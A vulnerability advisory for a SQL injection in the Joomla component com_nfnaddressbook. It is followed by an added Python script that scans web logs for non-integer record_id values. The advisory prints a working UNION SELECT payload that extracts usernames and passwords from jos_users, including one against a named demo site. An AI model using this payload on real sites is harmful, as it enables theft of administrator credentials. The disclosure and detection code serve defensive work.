<------------------- header data start ------------------- >
################################################################
Joomla Component com_nfnaddressbook SQL injection Vulnerability
###############################################################
# author : Fl0riX
# Name : com_nfnaddressbook
# Bug Type : SQL Injection
# Infection : Admin login credentials can be obtained.
# Demo Vuln. : http://www.joomlaportaldemo.com/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=2/**/and/**/1=0/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
# Bug Fix Advice : Harmful characters should be filtered.
#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >
path/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=2/**/and/**/1=0/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users--
< -- bug code end of -- >
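
The fix advice above, applied as an allow-list check on record_id and run over web-server logs. This is an added example, not part of the original advisory and not the component's code. The log lines are constructed, the access-log request format is an assumption, and treating record_id and Itemid as plain integers is inferred from the values in the advisory's URL.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Jan/2010:10:00:01 +0000] "GET /index.php?option=com_nfnaddressbook'
    '&Itemid=61&action=viewrecord&record_id=2 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [10/Jan/2010:10:02:13 +0000] "GET /index.php?option=com_nfnaddressbook'
    '&Itemid=61&action=viewrecord&record_id=2/**/and/**/1=0/**/union/**/select/**/1,2,3'
    '/**/from/**/jos_users-- HTTP/1.1" 200 812',
    '198.51.100.7 - - [10/Jan/2010:10:03:40 +0000] "GET /index.php?option=com_content'
    '&view=article&id=5 HTTP/1.1" 200 9000',
    '198.51.100.9 - - [10/Jan/2010:10:04:02 +0000] "GET /index.php?option=com_nfnaddressbook'
    '&action=viewrecord&record_id=2%2F%2A%2A%2Fand%2F%2A%2A%2F1%3D0 HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"[0-9]{1,10}")        # ASCII digits only, bounded length
NUMERIC_PARAMS = ("record_id", "Itemid")   # assumed to be integer ids


def check_request(target):
    """Return (param, decoded value) pairs that fail the integer allow-list."""
    # parse_qs percent-decodes, so encoded input is judged in decoded form.
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if "com_nfnaddressbook" not in params.get("option", []):
        return []
    return [(name, value)
            for name in NUMERIC_PARAMS
            for value in params.get(name, [])
            if not INT_RE.fullmatch(value)]


def scan(lines):
    """Return (line number, client, param, value) for every rejected parameter."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            for name, value in check_request(match.group(1)):
                findings.append((number, line.split()[0], name, value))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same allow-list belongs in the component itself before the value reaches the query; rejecting anything that is not an integer is stricter than trying to strip individual characters.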